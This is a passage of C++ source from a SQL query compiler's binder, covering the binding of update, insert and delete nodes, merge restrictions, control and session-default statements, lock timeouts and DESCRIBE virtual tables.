the Scan node. // SYSKEY is an exception since its name in the temp table is "@SYSKEY" ExtendedQualName::SpecialTableType tableType = scanNode->getTableDesc()->getCorrNameObj().getSpecialType(); NAColumn *scanNaCol = NULL; if (ExtendedQualName::TRIGTEMP_TABLE == tableType && colName == "SYSKEY") { scanNaCol = scanColArray.getColumn("@SYSKEY"); } else { scanNaCol = scanColArray.getColumn(colName); } CMPASSERT(scanNaCol != NULL) // Get the position of this column in the Scan table. Lng32 scanColPos = scanNaCol->getPosition(); // Get the Scan BaseColumn. scanCol = scanNode->getTableDesc()->getColumnList()[scanColPos].getItemExpr(); } ItemExpr *newKeyPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, guCol, scanCol); newKeyPred->bindNode(bindWA); beginKeyPred().insert(newKeyPred->getValueId()); updateToSelectMap().addMapEntry( newKeyPred->child(0)->getValueId(), newKeyPred->child(1)->getValueId()); } // loop over key columns // All of the indexes also require expressions that can be used to // form the primary key of the index to update/delete. Create these // item expressions here. // (From here to the end of the loop over indexes structurally resembles // GenericUpdate::imBindAllIndexes(), but has significant differences.) // // Remember the value ID's of the scan node index columns for // code generation time. 
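    // When an UPDATE is driven by a scan on a different table (the inlined
    // trigger temporary-table case), there is no usable scan index, so NULL
    // is recorded; otherwise the scan's clustering index is remembered.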
// if ((this->getOperatorType() == REL_UNARY_UPDATE) && isScanOnDifferentTable) { setScanIndexDesc(NULL); // for triggers } else { setScanIndexDesc(scanNode->getTableDesc()->getClusteringIndex()); } } // REL_UNARY_UPDATE or REL_UNARY_DELETE // QSTUFF // we need to check whether this code is executed as part of a create view // ddl operation using bindWA->inDDL() and prevent indices, contraints and // triggers to be added as the catalog manager binding functions cannot // handle it right now // QSTUFF // QSTUFF hack ! if (getGroupAttr()->isEmbeddedUpdate()) bindWA->setNameLocListPtr(pLoc); bindWA->setInGenericUpdate(inGenericUpdate); // QSTUFF // set flag that we are binding an Insert/Update/Delete operation // Used to disable Join optimization when necessary bindWA->setBindingIUD(); return boundExpr; } // GenericUpdate::bindNode() NABoolean GenericUpdate::checkForMergeRestrictions(BindWA *bindWA) { if (!isMerge()) return FALSE; ValueIdList tempVIDlist; getTableDesc()->getIdentityColumn(tempVIDlist); NAColumn *identityCol = NULL; if (tempVIDlist.entries() > 0) { ValueId valId = tempVIDlist[0]; identityCol = valId.getNAColumn(); } // MERGE on a table with BLOB columns is not supported if (getTableDesc()->getNATable()->hasLobColumn()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" LOB column not allowed."); bindWA->setErrStatus(); return TRUE; } if (getTableDesc()->hasUniqueIndexes() && (CmpCommon::getDefault(MERGE_WITH_UNIQUE_INDEX) == DF_OFF)) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" unique indexes not allowed."); bindWA->setErrStatus(); return TRUE; } if ((accessOptions().accessType() == SKIP_CONFLICT_) || (getGroupAttr()->isStream()) || (newRecBeforeExprArray().entries() > 0)) // set on rollback { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Stream, skip conflict or SET ON ROLLBACK not allowed."); bindWA->setErrStatus(); return TRUE; } if (getGroupAttr()->isEmbeddedUpdateOrDelete()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Embedded update/deletes not allowed."); bindWA->setErrStatus(); return TRUE; } if ((getInliningInfo().hasInlinedActions()) || (getInliningInfo().isEffectiveGU())) { if (getInliningInfo().hasTriggers()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Triggers not allowed."); bindWA->setErrStatus(); return TRUE; } } return FALSE; } // This class LeafInsert and its companion LeafDelete // are currently used only by Index Maintenance, // but we ought not make any assumptions. // ##IM: It might be useful to add a flag such as GenericUpdate::isIndexTable_ // ##IM: and set it to TRUE in createIMNode(). // RelExpr *LeafInsert::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } #ifndef NDEBUG if (GU_DEBUG) cerr << "\nLeafInsert " << getUpdTableNameText() << endl; #endif setInUpdateOrInsert(bindWA, this, REL_INSERT); if (getPreconditionTree()) { ValueIdSet pc; getPreconditionTree()->convertToValueIdSet(pc, bindWA, ITM_AND); if (bindWA->errStatus()) return this; setPreconditionTree(NULL); setPrecondition(pc); } RelExpr *boundExpr = GenericUpdate::bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; // Make newRecExprArray_ be an ordered set of assign nodes of the form // "ixcol1 = basetblcol1, ixcol2 = basecol2, ..." (for Index Maintenance) // Note: For SQL/MP tables, ixcol0 is the keytag, and will need to be // handled differently from other columns. 
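  // Each target (index) column is paired positionally with the corresponding
  // entry in baseColRefs(), producing one bound Assign per column below.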
const ValueIdList &tgtcols = getTableDesc()->getColumnList(); CMPASSERT(tgtcols.entries() == baseColRefs().entries()); for (CollIndex i = 0; i < tgtcols.entries(); i++) { Assign *assign; assign = new (bindWA->wHeap()) Assign(tgtcols[i].getItemExpr(), baseColRefs()[i], FALSE); assign->bindNode(bindWA); if (bindWA->errStatus()) return NULL; newRecExprArray().insertAt(i, assign->getValueId()); newRecExpr().insert(assign->getValueId()); updateToSelectMap().addMapEntry(assign->getTarget(), assign->getSource()); } // RelExpr::bindSelf (in GenericUpdate::bindNode) has done this line, but now // any outer refs discovered in bindNode's in the above loop must be added. // For Index Maintenance, these must be exactly the set of baseColRefs vids // (all the target index cols are from the locally-scoped RETDesc left by // the GenericUpdate::bindNode). getGroupAttr()->addCharacteristicInputs(bindWA->getCurrentScope()->getOuterRefs()); // The NATable of getTableName() had been set to INDEX_TABLE so that // getNATable would search the right namespace. // Now we make the Optimizer treat this as a regular table, not an index // (in particular, don't have it choose VSBB sidetree-insert). // // The TableDesc setting may be redundant/unnecessary, but we do it // for completeness and safety. // // -- Triggers // If it is NOT an index table (like maybe a TRIGTEMP_TABLE), leave it alone if (getTableName().getSpecialType() == ExtendedQualName::INDEX_TABLE) { getTableName().setSpecialType(ExtendedQualName::NORMAL_TABLE); getTableDesc()->getCorrNameObj().setSpecialType(ExtendedQualName::NORMAL_TABLE); } setInUpdateOrInsert(bindWA); return boundExpr; } // LeafInsert::bindNode() RelExpr *LeafDelete::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } #ifndef NDEBUG if (GU_DEBUG) cerr << "\nLeafDelete " << getUpdTableNameText() << endl; #endif if (getPreconditionTree()) { ValueIdSet pc; getPreconditionTree()->convertToValueIdSet(pc, bindWA, ITM_AND); if (bindWA->errStatus()) return this; setPreconditionTree(NULL); setPrecondition(pc); } RelExpr *boundExpr = GenericUpdate::bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; //Set the beginKeyPred if (TriggersTempTable *tempTableObj = getTrigTemp()) { const ValueIdList &keycols = getTableDesc()->getClusteringIndex()->getIndexKey(); ItemExpr *keyExpr; // Normal case - use the UniqueExecuteId builtin function. keyExpr = new(bindWA->wHeap()) UniqueExecuteId(); ItemExpr *tempKeyPred = new(bindWA->wHeap()) BiRelat(ITM_EQUAL, keycols[0].getItemExpr(), keyExpr); tempKeyPred->bindNode(bindWA); if (bindWA->errStatus()) return NULL; beginKeyPred().insert(tempKeyPred->getValueId()); // Create the ItemExpr for the constant UniqueIudNum ItemExpr *col2 = new(bindWA->wHeap()) ColReference(new(bindWA->wHeap()) ColRefName(UNIQUEIUD_COLUMN)); // Compare it to the correct offset. 
BindWA::uniqueIudNumOffset offset = BindWA::uniqueIudNumForInsert ; ItemExpr *iudConst = new(bindWA->wHeap()) ConstValue(bindWA->getUniqueIudNum(offset)); ItemExpr *predIudId = new(bindWA->wHeap()) BiRelat(ITM_EQUAL, keycols[1].getItemExpr(), iudConst); predIudId->bindNode(bindWA); if (bindWA->errStatus()) return NULL; beginKeyPred().insert(predIudId->getValueId()); for (CollIndex i = 2; i<keycols.entries(); i++) { ItemExpr *keyPred = NULL; ItemExpr *keyItemExpr = keycols[i].getItemExpr(); ItemExpr *baseItemExpr = NULL; Lng32 keyColPos = keycols[i].getNAColumn()->getPosition(); baseItemExpr = baseColRefs()[keyColPos]; keyPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, keyItemExpr, baseItemExpr); keyPred->bindNode(bindWA); if (bindWA->errStatus()) return NULL; beginKeyPred().insert(keyPred->getValueId()); } } else { const ValueIdList &keycols = getTableDesc()->getClusteringIndex()->getIndexKey(); for (CollIndex i = 0; i < keycols.entries() ; i++) { ItemExpr *keyPred = 0; ItemExpr *keyItemExpr = keycols[i].getItemExpr(); Lng32 keyColPos = keycols[i].getNAColumn()->getPosition(); ItemExpr *baseItemExpr = NULL; // For a unique index (for undo) we are passing in all the index // columns in baseColRefs. So we need to find the index key col // position in the index col list and compare the key columns with // it's corresponding column in the index column list if (isUndoUniqueIndex()) baseItemExpr = baseColRefs()[keyColPos]; else baseItemExpr = baseColRefs()[i]; keyPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, keyItemExpr, baseItemExpr); keyPred->bindNode(bindWA); if (bindWA->errStatus()) return NULL; beginKeyPred().insert(keyPred->getValueId()); } } if (isUndoUniqueIndex()) { setUpExecPredForUndoUniqueIndex(bindWA) ; } if (getTrigTemp()) { setUpExecPredForUndoTempTable(bindWA); } // See LeafInsert::bindNode for comments on remainder of this method. getGroupAttr()->addCharacteristicInputs(bindWA->getCurrentScope()->getOuterRefs()); getTableName().setSpecialType(ExtendedQualName::NORMAL_TABLE); getTableDesc()->getCorrNameObj().setSpecialType(ExtendedQualName::NORMAL_TABLE); return boundExpr; } // LeafDelete::bindNode() void LeafDelete::setUpExecPredForUndoUniqueIndex(BindWA *bindWA) { // Set up the executor predicate . Used in the case of Undo to undo the // exact row that caused an error.Note that if we used only the key // columns to undo, we may end up undoing existing rows . 
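  // Every index column (not just the key columns) is therefore compared to its
  // corresponding baseColRefs() entry and added to the executor predicate.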
// This is done only for unique indexes ItemExpr *execPred = NULL; const ValueIdList &indexCols = getTableDesc()->getClusteringIndex()->getIndexColumns(); for ( CollIndex i = 0; i < indexCols.entries(); i++) { execPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, indexCols[i].getItemExpr(), baseColRefs()[i]); execPred->bindNode(bindWA); if (bindWA->errStatus()) return ; executorPred() += execPred->getValueId(); } return; } void LeafDelete::setUpExecPredForUndoTempTable(BindWA *bindWA) { ItemExpr *execPred = NULL; const ValueIdList &tempCols = getTableDesc()->getClusteringIndex()->getIndexColumns(); for ( CollIndex i = 0; i < tempCols.entries(); i++) { NAString colName(tempCols[i].getNAColumn()->getColName()); if (colName.data()[0] == '@' && colName.compareTo("@SYSKEY")) continue; execPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, tempCols[i].getItemExpr(), baseColRefs()[i]); execPred->bindNode(bindWA); if (bindWA->errStatus()) return; executorPred() += execPred->getValueId(); } return; } // ----------------------------------------------------------------------- // RelRoutine // ----------------------------------------------------------------------- // LCOV_EXCL_START - rfi RelExpr *RelRoutine::bindNode(BindWA *bindWA) { CMPASSERT(0); // For the time being, all classes above implement their own. // // Allocate an RETDesc and attach it to this and the BindScope. // Needs to occur in later classes when we know if we are at table // type or not.. // XXX setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, getTableDesc())); // bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; // // Assign the set of columns that belong to the virtual table // as the output values that can be produced by this node. // // XXX done in later clasees // getGroupAttr()->addCharacteristicOutputs(getTableDesc()->getColumnList()); return boundExpr; } // RelRoutine::bindNode() // LCOV_EXCL_STOP // ----------------------------------------------------------------------- // BuiltinTableValuedFunction // will be called by // ExplainFunc and StatisticsFunc // Rely on function implementation in TableValuedFunction // ----------------------------------------------------------------------- // ----------------------------------------------------------------------- // Explain/Statistics/HiveMD Func // ----------------------------------------------------------------------- RelExpr *BuiltinTableValuedFunction::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // // Check if there is already an NATable for the Explain/Statistics table. // if (getOperatorType() == REL_EXPLAIN || getOperatorType() == REL_STATISTICS || getOperatorType() == REL_HIVEMD_ACCESS || getOperatorType() == REL_HBASE_ACCESS) { NATable *naTable = NULL; if (getOperatorType() == REL_HBASE_ACCESS) { // should not reach here CMPASSERT(0); } else { CorrName corrName(getVirtualTableName()); corrName.setSpecialType(ExtendedQualName::VIRTUAL_TABLE); NATable *naTable = bindWA->getSchemaDB()->getNATableDB()-> get(&corrName.getExtendedQualNameObj()); if (NOT naTable) { desc_struct *tableDesc = createVirtualTableDesc(); if (tableDesc) naTable = bindWA->getNATable(corrName, FALSE/*catmanUsages*/, tableDesc); if ( ! tableDesc || bindWA->errStatus() ) return this; } // Allocate a TableDesc and attach it to this. 
// TableDesc * td = bindWA->createTableDesc(naTable, corrName); if (! td || bindWA->errStatus()) return this; setTableDesc(td); if (bindWA->errStatus()) return this; } if (getProcAllParamsTree()) { ((ItemExpr *)getProcAllParamsTree())->convertToValueIdList(getProcAllParamsVids(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return this; // Clear the Tree since we now have gotten vids for all the parameters. setProcAllParamsTree(NULL); Lng32 sqlcode = 0; if (getProcAllParamsVids().entries() != numParams()) { sqlcode = -4067; // 4067 Explain/Statistics requires two operands, of type character. *CmpCommon::diags() << DgSqlCode(sqlcode) << DgString0(getTextForError()); bindWA->setErrStatus(); return NULL; } // type any param arguments to fixed char since runtime explain // expects arguments to be fixed char. Lng32 len = (Lng32)CmpCommon::getDefaultNumeric(VARCHAR_PARAM_DEFAULT_SIZE); SQLChar c(len); for (Lng32 i = 0; i < numParams(); i++) { getProcAllParamsVids()[i].coerceType(c, NA_CHARACTER_TYPE); if (getProcAllParamsVids()[i].getType().getTypeQualifier() != NA_CHARACTER_TYPE) { sqlcode = -4067; // 4067 Explain/Statistics requires two operands, of type character. *CmpCommon::diags() << DgSqlCode(sqlcode) << DgString0(getTextForError()); bindWA->setErrStatus(); return NULL; } const NAType &typ = getProcAllParamsVids()[i].getType(); CharInfo::CharSet chld_cs = ((const CharType&)typ).getCharSet(); ItemExpr *ie; if ( chld_cs == CharInfo::UNICODE ) { ie = new (bindWA->wHeap()) Translate( getProcAllParamsVids()[i].getItemExpr(), Translate::UNICODE_TO_ISO88591); ie = ie->bindNode(bindWA); getProcAllParamsVids()[i] = ie->getValueId(); } if (bindWA->errStatus()) return NULL; // For Explain and Statistics all parameters are inputs getProcInputParamsVids().insert(getProcAllParamsVids()); } // for } } // if return TableValuedFunction::bindNode(bindWA); } // ----------------------------------------------------------------------- // TableValuedFunction // ----------------------------------------------------------------------- RelExpr *TableValuedFunction::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // // Allocate an RETDesc and attach it to this and the BindScope. // setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, getTableDesc())); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; // // Assign the set of columns that belong to the virtual table // as the output values that can be produced by this node. // getGroupAttr()->addCharacteristicOutputs(getTableDesc()->getColumnList()); return boundExpr; } // TableValuedFunction::bindNode() // ----------------------------------------------------------------------- // Member functions for classes Control* // must be written allowing for a NULL BindWA to be passed in! // // This happens when called from the SQLC/SQLCO Preprocessor, // which needs to bind certain "static-only" statements -- // those which evaluate to STATIC_ONLY_WITH_WORK_FOR_PREPROCESSOR -- // see ControlAbstractClass::isAStaticOnlyStatement(). 
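// ControlAbstractClass::bindNode() therefore returns early when bindWA is
// NULL, and the derived classes guard their own bindWA uses (ControlTable
// still asserts, since it cannot yet be called that way).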
// ----------------------------------------------------------------------- RelExpr * ControlAbstractClass::bindNode(BindWA *bindWA) { if (nodeIsBound()) return this; // Early return if called by SQLC/SQLCO Preprocessor if (!bindWA) return this; // Allocate an empty RETDesc and attach it to this node and the BindScope. setRETDesc(new(bindWA->wHeap()) RETDesc(bindWA)); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return bindSelf(bindWA); } // ControlAbstractClass::bindNode() RelExpr * ControlQueryShape::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // remember the required shape in the control table if (alterArkcmpEnvNow()) { if (getShape()) ActiveControlDB()->setRequiredShape(this); else { // no shape passed in. Hold or Restore. if (holdShape()) ActiveControlDB()->saveCurrentCQS(); else ActiveControlDB()->restoreCurrentCQS(); if (ActiveControlDB()->getRequiredShape()) ActiveControlDB()->getRequiredShape()->holdShape() = holdShape(); } } return ControlAbstractClass::bindNode(bindWA); } // ControlQueryShape::bindNode() RelExpr * ControlQueryDefault::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Alter the current Defaults settings if this is a static CQD. // // "AffectYourself" is coming to you courtesy of the Staple Singers: // 'Affect yourself, na na na, na na na na, affect yourself, re re re re.' // It's neat to find such Binder-relevant lyrics, eh? // NABoolean affectYourself = alterArkcmpEnvNow(); assert(!bindWA || bindWA->getSchemaDB() == ActiveSchemaDB()); NADefaults &defs = ActiveSchemaDB()->getDefaults(); defs.setState(NADefaults::SET_BY_CQD); if ( defs.isReadonlyAttribute(token_) == TRUE ) { Int32 attrNum = defs.lookupAttrName(token_); if (stricmp(value_, defs.getValue(attrNum)) != 0 ) { if (CmpCommon::getDefault(DISABLE_READ_ONLY) == DF_OFF) { if (bindWA) bindWA->setErrStatus(); *CmpCommon::diags() << DgSqlCode(-4130) << DgString0(token_); return NULL; } } } if (holdOrRestoreCQD_ == 0) { attrEnum_ = affectYourself ? defs.validateAndInsert(token_, value_, reset_) : defs.validate (token_, value_, reset_); if (attrEnum_ < 0) { if (bindWA) bindWA->setErrStatus(); return NULL; } // remember this control in the control table if (affectYourself) ActiveControlDB()->setControlDefault(this); } else if ((holdOrRestoreCQD_ > 0) && (affectYourself)) { attrEnum_ = defs.holdOrRestore(token_, holdOrRestoreCQD_); if (attrEnum_ < 0) { if (bindWA) bindWA->setErrStatus(); return NULL; } } return ControlAbstractClass::bindNode(bindWA); } // ControlQueryDefault::bindNode() RelExpr * ControlTable::bindNode(BindWA *bindWA) { if (nodeIsBound()) return this; CMPASSERT(bindWA); // can't handle it yet if called from SQLC Preprocessor // remember this control in the control table tableName_->applyDefaults(bindWA, bindWA->getDefaultSchema()); NABoolean ok = alterArkcmpEnvNow() ? ActiveControlDB()->setControlTableValue(this) : ActiveControlDB()->validate(this); if (NOT ok) { if (bindWA) bindWA->setErrStatus(); return NULL; } return ControlAbstractClass::bindNode(bindWA); } // ControlTable::bindNode() RelExpr * ControlSession::bindNode(BindWA *bindWA) { if (nodeIsBound()) return this; // remember this control in the control session NABoolean ok = alterArkcmpEnvNow() ? 
ActiveControlDB()->setControlSessionValue(this) : ActiveControlDB()->validate(this); if (NOT ok) { if (bindWA) bindWA->setErrStatus(); return NULL; } return ControlAbstractClass::bindNode(bindWA); } // ControlSession::bindNode() RelExpr * SetSessionDefault::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } if (getOperatorType() == REL_SET_SESSION_DEFAULT) { // trim leading and trailing spaces from token_ and value_ // and upcase token token_ = token_.strip(NAString::both); value_ = value_.strip(NAString::both); token_.toUpper(); // TBD: perhaps add a component privilege that allows others // to set parserflags if ((token_ == "SET_PARSERFLAGS") || (token_ == "RESET_PARSERFLAGS")) { if (!ComUser::isRootUserID()) { *CmpCommon::diags() << DgSqlCode(-1017); bindWA->setErrStatus(); return this; } } } return ControlAbstractClass::bindNode(bindWA); } // SetSessionDefault::bindNode() // ----------------------------------------------------------------------- // member function for class RelSetTimeout // ----------------------------------------------------------------------- RelExpr * RelSetTimeout::bindNode(BindWA *bindWA) { if (nodeIsBound()) return this; // Allocate an empty RETDesc and attach it to this node and the BindScope. setRETDesc(new(bindWA->wHeap()) RETDesc(bindWA)); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); if (timeoutValueExpr_) { // bind the timeout-value expression timeoutValueExpr_->bindNode(bindWA); if (bindWA->errStatus()) return this; } if ( ! strcmp("*", userTableName_.getCorrNameAsString()) ) isForAllTables_ = TRUE ; HostVar *proto = userTableName_.getPrototype() ; // Check for the not-supported "SET STREAM TIMEOUT" on a specific stream if ( isStream_ && ! isForAllTables_ ) { *CmpCommon::diags() << DgSqlCode(-3187); bindWA->setErrStatus(); return this; } if ( isForAllTables_ ) { /* do nothing */ } else if ( proto ) { // it is a HOSTVAR or DEFINE userTableName_.applyDefaults(bindWA, bindWA->getDefaultSchema()); CMPASSERT ( proto->isPrototypeValid() ) ; userTableName_.getPrototype()->bindNode(bindWA); } else { // i.e., an explicit table name was specified // Get the NATable for this table. NATable *naTable = bindWA->getNATable(userTableName_, FALSE); if (bindWA->errStatus()) return this; // e.g. error: table does not exist if ( naTable->getViewText() ) { // can not set lock timeout on a view *CmpCommon::diags() << DgSqlCode(-3189); bindWA->setErrStatus(); return this; } // Extract and keep the physical file name const NAFileSet * clstInd = naTable->getClusteringIndex() ; setPhysicalFileName( clstInd->getFileSetName().getQualifiedNameAsString().data() ); } // Bind the base class. return bindSelf(bindWA); } // ----------------------------------------------------------------------- // member functions for class Describe // (see sqlcomp/CmpDescribe.cpp for execution of the request) // ----------------------------------------------------------------------- RelExpr *Describe::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // SHOWCONTROL DEFAULT "magic string"; -- see ShowSchema.h and ExSqlComp.cpp if (getFormat() == CONTROL_DEFAULTS_) { if (getDescribedTableName().getQualifiedNameObj().getObjectName() == ShowSchema::ShowControlDefaultSchemaMagic()) { // Return info in an error message (a warning msg doesn't cut it). 
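      // The default catalog and schema are handed back through the
      // ShowSchema::DiagSqlCode() diagnostic's catalog/schema name parameters.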
const SchemaName &catsch = bindWA->getDefaultSchema(); NAString cat(catsch.getCatalogNameAsAnsiString(),bindWA->wHeap()); NAString sch(catsch.getUnqualifiedSchemaNameAsAnsiString(),bindWA->wHeap()); // if (SqlParser_NAMETYPE == DF_NSK) { // LCOV_EXCL_START - nsk // The cat & sch from the BindWA are really from MPLOC. // Get the real ANSI cat & sch, prepending them to the strings // and put the MPLOC info in parens. const SchemaName &csAnsi = ActiveSchemaDB()->getDefaultSchema(); NAString cAnsi(csAnsi.getCatalogNameAsAnsiString(),bindWA->wHeap()); NAString sAnsi(csAnsi.getUnqualifiedSchemaNameAsAnsiString(),bindWA->wHeap()); cat.prepend(cAnsi + " ("); cat += ")"; sch.prepend(sAnsi + " ("); sch += ")"; // LCOV_EXCL_STOP } *CmpCommon::diags() << DgSqlCode(-ABS(ShowSchema::DiagSqlCode())) << DgCatalogName(cat) << DgSchemaName (sch); bindWA->setErrStatus(); return this; } if (getDescribedTableName().getQualifiedNameObj().getObjectName() == GetControlDefaults::GetExternalizedDefaultsMagic()) { // Return info in an error message (a warning msg doesn't cut it). NAString cqdPairs(bindWA->wHeap()); size_t lenN, lenV; char lenbufN[10], lenbufV[10]; const char *nam, *val; NADefaults &defs = bindWA->getSchemaDB()->getDefaults(); for (CollIndex i = 0; i < defs.numDefaultAttributes(); i++ ) { if (defs.getCurrentDefaultsAttrNameAndValue(i, nam, val, TRUE)) { lenN = strlen(nam); lenV = strlen(val); CMPASSERT(lenN <= 999 && lenV <= 999); // %3d coming up next sprintf(lenbufN, "%3d", (UInt32)lenN); sprintf(lenbufV, "%3d", (UInt32)lenV); cqdPairs += NAString(lenbufN) + nam + lenbufV + val; } } *CmpCommon::diags() << DgSqlCode(-ABS(GetControlDefaults::DiagSqlCode())) << DgString0(cqdPairs); bindWA->setErrStatus(); return this; } } // Create a descriptor for a virtual table to look like this: // // CREATE TABLE DESCRIBE__ (DESCRIBE__COL VARCHAR(3000) NOT NULL); // For SeaQuest Unicode: // CREATE TABLE DESCRIBE__ (DESCRIBE__COL VARCHAR(3000 BYTES) CHARACTER SET UTF8 NOT NULL); // #define MAX_DESCRIBE_LEN 3000 // e.g., SQL/MP Views.ViewText column // readtabledef_allocate_desc requires that HEAP (STMTHEAP) be used for new's! 
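  // Build the descriptor by hand: a table desc, its files desc, the single
  // VARCHAR(3000) UTF8 column, and a key-sequenced primary index with one key
  // column, all allocated on the statement heap.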
desc_struct * table_desc = readtabledef_allocate_desc(DESC_TABLE_TYPE); table_desc->body.table_desc.tablename = new HEAP char[strlen("DESCRIBE__")+1]; strcpy(table_desc->body.table_desc.tablename, "DESCRIBE__"); // see nearly identical code below for indexes file desc desc_struct * files_desc = readtabledef_allocate_desc(DESC_FILES_TYPE); table_desc->body.table_desc.files_desc = files_desc; files_desc->body.files_desc.fileorganization = KEY_SEQUENCED_FILE; Lng32 colnumber = 0, offset = 0; desc_struct * column_desc = readtabledef_make_column_desc( table_desc->body.table_desc.tablename, "DESCRIBE__COL", colnumber, // INOUT REC_BYTE_V_ASCII, MAX_DESCRIBE_LEN, offset); // INOUT column_desc->body.columns_desc.character_set = CharInfo::UTF8; column_desc->body.columns_desc.encoding_charset = CharInfo::UTF8; table_desc->body.table_desc.colcount = colnumber; table_desc->body.table_desc.record_length = offset; desc_struct * index_desc = readtabledef_allocate_desc(DESC_INDEXES_TYPE); index_desc->body.indexes_desc.tablename = table_desc->body.table_desc.tablename; index_desc->body.indexes_desc.indexname = table_desc->body.table_desc.tablename; index_desc->body.indexes_desc.ext_indexname = table_desc->body.table_desc.tablename; index_desc->body.indexes_desc.keytag = 0; // primary index index_desc->body.indexes_desc.record_length = table_desc->body.table_desc.record_length; index_desc->body.indexes_desc.colcount = table_desc->body.table_desc.colcount; index_desc->body.indexes_desc.blocksize = 4096; // anything > 0 // Cannot simply point to same files desc as the table one, // because then ReadTableDef::deleteTree frees same memory twice (error) desc_struct * i_files_desc = readtabledef_allocate_desc(DESC_FILES_TYPE); index_desc->body.indexes_desc.files_desc = i_files_desc; i_files_desc->body.files_desc.fileorganization = KEY_SEQUENCED_FILE; desc_struct * key_desc = readtabledef_allocate_desc(DESC_KEYS_TYPE); key_desc->body.keys_desc.indexname = index_desc->body.indexes_desc.indexname; key_desc->body.keys_desc.keyseqnumber = 1; key_desc->body.keys_desc.tablecolnumber = 0; key_desc->body.keys_desc.ordering= 0; index_desc->body.indexes_desc.keys_desc = key_desc; table_desc->body.table_desc.columns_desc = column_desc; table_desc->body.table_desc.indexes_desc = index_desc; // // Get the NATable for this object. // CorrName corrName("DESCRIBE__"); corrName.setSpecialType(ExtendedQualName::VIRTUAL_TABLE); NATable *naTable = bindWA->getNATable(corrName, FALSE/*CatBind*/, table_desc); if (bindWA->errStatus()) return this; // // Allocate a TableDesc (which is not the table_desc we just constructed) // and attach it to the Scan node. // setTableDesc(bindWA->createTableDesc(naTable, corrName)); if (bindWA->errStatus()) return this; // // Allocate an RETDesc and attach it to the Scan node and the BindScope. // setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, getTableDesc())); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // // Bind the described table CorrName member, the children, and the base class. // if (! describedTableName_.getQualifiedNameObj().getObjectName().isNull()) { if ((getFormat() >= CONTROL_FIRST_) && (getFormat() <= CONTROL_LAST_)) { describedTableName_.applyDefaults(bindWA, bindWA->getDefaultSchema()); } else { // do not override schema for showddl bindWA->setToOverrideSchema(FALSE); // if this is a showlabel command on a resource fork, // but the describedTableName // is not a fully qualified rfork name, then get the rfork name // for the specified table. 
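      // (The resource fork name is derived below from the clustering index's
      // file set name by bumping its last character by one -- e.g. a physical
      // name ending in ...00 yields a resource fork name ending in ...01.)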
if ((getFormat() == Describe::LABEL_) && (describedTableName_.getSpecialType() == ExtendedQualName::RESOURCE_FORK) && (describedTableName_.getLocationName().isNull())) { describedTableName_.setSpecialType(ExtendedQualName::NORMAL_TABLE); NATable *naTable = bindWA->getNATable(describedTableName_); if (NOT bindWA->errStatus()) { // replace the describedTableName with its rfork name. describedTableName_.setSpecialType(ExtendedQualName::RESOURCE_FORK); NAString rforkName = naTable->getClusteringIndex()->getFileSetName().getQualifiedNameAsString(); char * rforkNameData = (char*)(rforkName.data()); rforkNameData[rforkName.length()-1] += 1; describedTableName_.setLocationName(rforkName); } } // check if we need to consider public schema before // describedTableName_ is qualified by getNATable if (describedTableName_.getQualifiedNameObj().getSchemaName().isNull()) setToTryPublicSchema(TRUE); bindWA->getNATable(describedTableName_); if (bindWA->errStatus()) { // if volatile related error, return it. // Otherwise, clear diags and let this error be caught // when describe is executed. if ((CmpCommon::diags()->mainSQLCODE() == -4190) || (CmpCommon::diags()->mainSQLCODE() == -4191) || (CmpCommon::diags()->mainSQLCODE() == -4192) || (CmpCommon::diags()->mainSQLCODE() == -4193) || (CmpCommon::diags()->mainSQLCODE() == -4155) || // define not supported (CmpCommon::diags()->mainSQLCODE() == -4086) || // catch Define Not Found error (CmpCommon::diags()->mainSQLCODE() == -30044)) // default schema access error return this; CmpCommon::diags()->clear(); bindWA->resetErrStatus(); } } if (pUUDFName_ NEQ NULL AND NOT pUUDFName_->getObjectName().isNull()) { pUUDFName_->applyDefaults(bindWA->getDefaultSchema()); } } bindChildren(bindWA); RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; // // Assign the set of columns that belong to the table to be scanned // as the output values that can be produced by this scan. // getGroupAttr()->addCharacteristicOutputs(getTableDesc()->getColumnList()); return 